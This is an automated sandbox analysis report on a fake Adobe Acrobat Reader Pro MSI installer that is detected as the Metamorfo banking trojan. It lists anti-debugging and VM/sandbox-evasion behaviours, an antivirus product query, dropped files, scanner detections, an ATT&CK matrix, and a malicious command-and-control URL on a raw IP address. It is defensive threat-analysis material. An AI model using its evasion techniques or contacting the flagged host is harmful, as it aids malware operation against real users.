Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	System information queried: FirmwareTableInformation	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Adobe Acrobat Pro.exe, 00000007.00000002.2403427332.000000000220E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Special instruction interceptor: First address: 000000001C9E4AE1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Special instruction interceptor: First address: 000000001B6CA12F instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Code function: 8_2_1B3C006D rdtsc

8_2_1B3C006D

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIDF32.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIDE94.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIDEC4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIDE35.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: Adobe Acrobat Pro.exe, 00000008.00000003.2472646164.000000000203C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;Cx~
Source: Adobe Acrobat Pro.exe, 00000007.00000003.2394655428.0000000002248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Code function: 8_2_1B3C006D rdtsc

8_2_1B3C006D

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Jump to behavior

Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: Shell_TrayWndSVW
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: Shell_TrayWndTrayNotifyWndSV
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Code function: 8_2_1A76097E cpuid

8_2_1A76097E

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Metamorfo

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Metamorfo

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Replication Through Removable Media	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	2 Process Injection	21 Masquerading	1 Credential API Hooking	541 Security Software Discovery	1 Replication Through Removable Media	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	22 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	1 Multi-hop Proxy	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	22 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	11 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Scheduled Transfer	1 Proxy			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Adobe_Acrobate_Reader_Pro-HAv70.msi	11%	ReversingLabs	Win32.Trojan.BankerX
Adobe_Acrobate_Reader_Pro-HAv70.msi	0%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	2%	ReversingLabs
C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll	43%	ReversingLabs	Win32.Trojan.BankerX
C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll	49%	Virustotal		Browse
C:\Windows\Installer\MSIDD98.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDD98.tmp	0%	Virustotal		Browse
C:\Windows\Installer\MSIDE35.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDE35.tmp	0%	Virustotal		Browse
C:\Windows\Installer\MSIDE94.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDE94.tmp	0%	Virustotal		Browse
C:\Windows\Installer\MSIDEC4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDEC4.tmp	0%	Virustotal		Browse
C:\Windows\Installer\MSIDF32.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIDF32.tmp	0%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://www.tiro.com	0%	URL Reputation	safe
http://www.indyproject.org/	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.vso-software.frU	0%	Avira URL Cloud	safe
http://www.goodfont.co.krp	0%	Avira URL Cloud	safe
http://www.delphi-jedi.org	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/p	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	Avira URL Cloud	safe
http://www.typography.net	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/2	0%	Avira URL Cloud	safe
http://www.soft-gems.net	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/0	0%	Avira URL Cloud	safe
http://www.typography.net	0%	Virustotal		Browse
http://www.jiyu-kobo.co.jp/2	0%	Virustotal		Browse
http://www.carterandcone.com	0%	Virustotal		Browse
http://www.galapagosdesign.com/p	0%	Virustotal		Browse
http://www.icon-king.com/projects/nuvola/v=	0%	Avira URL Cloud	safe
http://www.delphi-jedi.org	1%	Virustotal		Browse
http://www.ascendercorp.com/typedesigners.html	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/p	0%	Avira URL Cloud	safe
http://www.icon-king.com/projects/nuvola/v=	0%	Virustotal		Browse
http://www.galapagosdesign.com/	0%	Avira URL Cloud	safe
http://everaldo.com/crystal/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/0	0%	Virustotal		Browse
http://www.soft-gems.net	1%	Virustotal		Browse
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/p	0%	Virustotal		Browse
http://www.ascendercorp.com/typedesigners.html	0%	Virustotal		Browse
http://jvcl.delphi-jedi.org/	0%	Avira URL Cloud	safe
http://www.lifeboat.jp/products/ctv1/ctv1_buy.html	0%	Avira URL Cloud	safe
http://www.sandoll.co.krp	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Virustotal		Browse
http://www.galapagosdesign.com/	0%	Virustotal		Browse
http://www.oxygen-icons.org/	0%	Avira URL Cloud	safe
http://nuovext.pwsp.net	0%	Avira URL Cloud	safe
http://everaldo.com/crystal/	1%	Virustotal		Browse
http://www.soft-gems.net/supplement/download.php?ID=28	0%	Avira URL Cloud	safe
http://www.oxygen-icons.org/	1%	Virustotal		Browse
http://en.wikiped	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	Avira URL Cloud	safe
http://nuovext.pwsp.net	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://185.228.72.212/contador/serv.php	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	Virustotal		Browse
http://www.lifeboat.jp/products/ctv1/ctv1_buy.html	0%	Virustotal		Browse
http://www.fontbureau.comp	0%	Avira URL Cloud	safe
http://jvcl.delphi-jedi.org/	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://www.soft-gems.net/supplement/download.php?ID=28	0%	Virustotal		Browse
http://185.228.72.212/contador/serv.php	1%	Virustotal		Browse
http://www.founder.com.cn/cn/	0%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.228.72.212/contador/serv.php	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.delphi-jedi.org	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://art.gnome.org/2	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://fontawesome.io	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://forums.vso-software.fr/convertxtodvd-batcher-t19034.htmlU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.frU	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://code.google.com/p/gnome-colors/P	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.goodfont.co.krp	Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://forums.vso-software.fr/convertxtodvd-batcher-beta-t19034.html	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/?adl=1	Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	false		high
http://www.vso-software.fr/products/U	Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	false		high
http://www.tiro.com	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000750A000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007448000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073E6000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007518000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007451000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073E6000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007611000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743709263.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFC00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2094547921.00000000FFC30000.00000004.00001000.00020000.00000000.sdmp	false		high
